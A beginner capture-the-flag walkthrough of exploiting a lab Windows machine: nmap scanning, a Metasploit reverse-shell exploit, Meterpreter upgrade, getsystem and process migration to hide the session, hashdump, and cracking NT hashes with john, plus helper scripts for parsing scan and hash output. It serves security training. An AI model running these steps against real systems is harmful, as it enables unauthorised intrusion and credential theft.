An educational series on Windows exploitation for complete beginners. A walkthrough.
Task 1: Recon
We start our recon by scanning the target machine with Nmap.
How many ports are open with a port number under 1000?
If you run the scan with the -A flag it will scan all the ports on the host, but we only need port numbers below 1000, so it is better to specify -p 1-1000 to scan just the first 1000 ports.
What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08–067)
To get this answer I ran Nmap's vulnerability-detection scripts (the vuln script category) against the host:
nmap --script vuln <TARGET_IP>
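Nmap's greppable output (-oG) is the easiest thing to post-process when answering "how many open ports are below 1000?". The following parser is an added example, not part of the original walkthrough; the scan lines it reads are constructed sample data, not output from the room's target.

```python
# Added example (not part of the original walkthrough): a small parser for
# Nmap's greppable output (-oG) that counts open ports with a port number
# below 1000. The scan data below is constructed for illustration.

SAMPLE_GNMAP = """\
# Nmap 7.80 scan initiated as: nmap -p 1-1000 -oG scan.gnmap 10.0.0.5
Host: 10.0.0.5 ()\tStatus: Up
Host: 10.0.0.5 ()\tPorts: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-wbt-server///, 49152/filtered/tcp//unknown///\tIgnored State: closed (995)
# Nmap done at Mon Jan  1 00:00:00 2024
"""


def parse_gnmap_ports(text):
    """Yield (host, port, state, proto, service) for every port entry.

    In -oG output each host line is tab-separated into 'Host:', 'Ports:' and
    'Ignored State:' fields; each entry inside 'Ports:' has the layout
    port/state/protocol/owner/service/rpcinfo/version/ and entries are
    separated by ', '.
    """
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        fields = line.split("\t")
        host = fields[0].split()[1]
        for field in fields[1:]:
            if not field.startswith("Ports:"):
                continue
            for entry in field[len("Ports:"):].strip().split(", "):
                parts = entry.split("/")
                if len(parts) < 5:
                    continue  # malformed entry, skip it
                yield host, int(parts[0]), parts[1], parts[2], parts[4]


def open_ports(text):
    """Sorted list of port numbers whose state is exactly 'open'
    (filtered / open|filtered ports are deliberately not counted)."""
    return sorted({p for _, p, state, _, _ in parse_gnmap_ports(text)
                   if state == "open"})


def count_open_below(text, limit=1000):
    """Count open ports with a number strictly below `limit`."""
    return sum(1 for p in open_ports(text) if p < limit)


if __name__ == "__main__":
    print("open ports:", open_ports(SAMPLE_GNMAP))
    print("open ports under 1000:", count_open_below(SAMPLE_GNMAP))
```

Run a real scan with `-oG scan.gnmap` and point `count_open_below` at the file's contents; only ports Nmap reports as exactly `open` are counted, which matters because a `filtered` port is not an open service.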
Task 2: Gain Access
(To do that, type the following command in the terminal:)
Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)
Show options and set the one required value. What is the name of this value? (All caps for submission)
Usually it would be fine to run this exploit as is; however, for the sake of learning, you should do one more thing before exploiting the target. Enter the following command and press enter:
set payload windows/x64/shell/reverse_tcp
With that done, run the exploit!
Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.
And we got the 🐚 😄
Task 3: Escalate
In this task we need to figure out how to upgrade a plain shell to a Meterpreter shell in Metasploit.
What is the name of the post module we will use?
Select this (use MODULE_PATH).
Show options, what option are we required to change?
And it makes sense: we got a shell in Task 2 and sent that session (session 1) to the background. So we want to upgrade that shell session to a Meterpreter session, which gives us more powerful commands to use on the exploited machine.
Set the required option, you may need to list all of the sessions to find your target here.
Run! If this doesn’t work, try completing the exploit from the previous task once more.
Once the meterpreter shell conversion completes, select that session for use.
Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a DOS shell via the command ‘shell’ and run ‘whoami’; this should return that we are indeed SYSTEM. Background this shell afterwards and select our meterpreter session for use again.
List all of the processes running via the ‘ps’ command. Just because we are system doesn’t mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id (far left column).
Migrate to this process using the ‘migrate PROCESS_ID’ command where the process id is the one you just wrote down in the previous step. This may take several attempts, migrating processes is not very stable. If this fails, you may need to re-run the conversion process or reboot the machine and start once again. If this happens, try a different process next time.
Normally you want persistence on the target machine without your meterpreter process standing out among the other processes. That is why it is important to hide the meterpreter shell by migrating it into another process.
Task 4: Cracking
Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?
Copy this password hash to a file and research how to crack it. What is the cracked password?
There are multiple types/formats of hashes.
Pentestmonkey has a good cheat sheet for reference:
I’ve encountered the following problems using John the Ripper. These are not problems with the tool itself, but inherent problems with pentesting and password cracking in general.
Sometimes I stumble across hashes on a pentest, but don’t recognise the format, don’t know if it’s supported by john, or whether there are multiple “--format” options I should try.
The hashes you collect on a pentest sometimes need munging into a different format… but what’s the format john is expecting?
John will occasionally recognise your hashes as the wrong type (e.g. “Raw MD5” as “LM DES”). This is inevitable because some hashes look identical.
Sometimes I gain access to a system, but can’t recall how to recover the password hashes for that particular application / OS.
So when I first tried to run John with the default wordlist to crack the hash obtained earlier, I got the following “hint”:
There was also a hint from THM that the hash can be cracked with the rockyou.txt wordlist.
So I copied all the files I needed, the obtained hashes (saved in hashes.hash) and the wordlist (which I renamed to john.lst; you don’t have to do this, it was just more convenient for me), to the /tmp directory, ran john with the NT format, and got the cracked password for the user Jon:
john --format=NT --wordlist=john.lst hashes.hash
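The "which format is this?" problem from the cheat sheet above applies directly to hashdump output: the LM and NT fields are both 32 hex characters, so the format is known from the field position, not from the hash's shape. The script below is an added example, not part of the original walkthrough: it parses pwdump-style hashdump lines, flags the non-default account, notes the checks worth doing before cracking, and writes the NT hashes in the `user:hash` form that `john --format=NT` loads. The Administrator and Jon hash values are constructed placeholders, not the room's real hashes; the two "empty" hash constants are well-known Windows values.

```python
# Added example (not part of the original walkthrough): parse Meterpreter
# 'hashdump' output, pick out the non-default account and emit lines in the
# form john expects for --format=NT. Hash values for Administrator and Jon
# are constructed placeholders; the two "empty" constants are well known.

import re

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "" (LM storage disabled)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password
BUILTIN_ACCOUNTS = {"Administrator", "Guest", "DefaultAccount", "WDAGUtilityAccount"}
HEX32 = re.compile(r"^[0-9a-fA-F]{32}$")

# Constructed sample in pwdump layout: user:rid:lm_hash:nt_hash:::
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
"""


def parse_hashdump(text):
    """Return a list of dicts (user, rid, lm, nt) for each well-formed line;
    prompt echoes and other junk lines are skipped."""
    records = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4:
            continue  # not a pwdump line
        user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
        if not (rid.isdigit() and HEX32.match(lm) and HEX32.match(nt)):
            continue  # malformed entry
        records.append({"user": user, "rid": int(rid), "lm": lm, "nt": nt})
    return records


def describe(record):
    """Checks worth making before cracking. Both fields are 32 hex chars, so
    the format comes from the field position, not the hash's shape (the
    mis-detection the cheat sheet warns about)."""
    notes = []
    if record["rid"] == 500:
        notes.append("built-in Administrator (RID 500), even if renamed")
    if record["lm"] == EMPTY_LM:
        notes.append("no LM hash stored; the NT field is what --format=NT cracks")
    else:
        notes.append("LM hash present (LM storage enabled); loadable with --format=LM")
    if record["nt"] == EMPTY_NT:
        notes.append("blank password")
    return notes


def non_default_users(records):
    """Accounts that are not Windows built-ins."""
    return [r["user"] for r in records if r["user"] not in BUILTIN_ACCOUNTS]


def to_john_nt(records):
    """'user:nthash' lines, which john --format=NT loads directly;
    blank-password accounts need no cracking and are left out."""
    return [f"{r['user']}:{r['nt']}" for r in records if r["nt"] != EMPTY_NT]


if __name__ == "__main__":
    recs = parse_hashdump(SAMPLE_HASHDUMP)
    print("non-default users:", non_default_users(recs))
    for r in recs:
        print(r["user"], "->", "; ".join(describe(r)))
    print("\n".join(to_john_nt(recs)))
```

Feed the real `hashdump` output to `parse_hashdump`, write `to_john_nt` to `hashes.hash`, and the `john --format=NT` command above works unchanged. The RID 500 check is the one to remember: a renamed Administrator still carries RID 500, so the name alone does not tell you which account is the built-in one.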
Task 5: Find flags!
Find the three flags planted on this machine. These are not traditional flags, rather, they’re meant to represent key locations within the Windows system. Use the hints provided below to complete this room!
Flag1? This flag can be found at the system root.
I switched from the meterpreter shell back to a DOS shell, navigated to the C: drive and found the first flag:
Flag2? This flag can be found at the location where passwords are stored within Windows.
Finding this flag was easy: there is a handy command for searching for files, and since I already knew the exact name of the file I just specified it and got the exact location:
dir /b/s *.txt
Flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.
And in the same fashion I easily obtained the third flag. To read the flag, use the following command: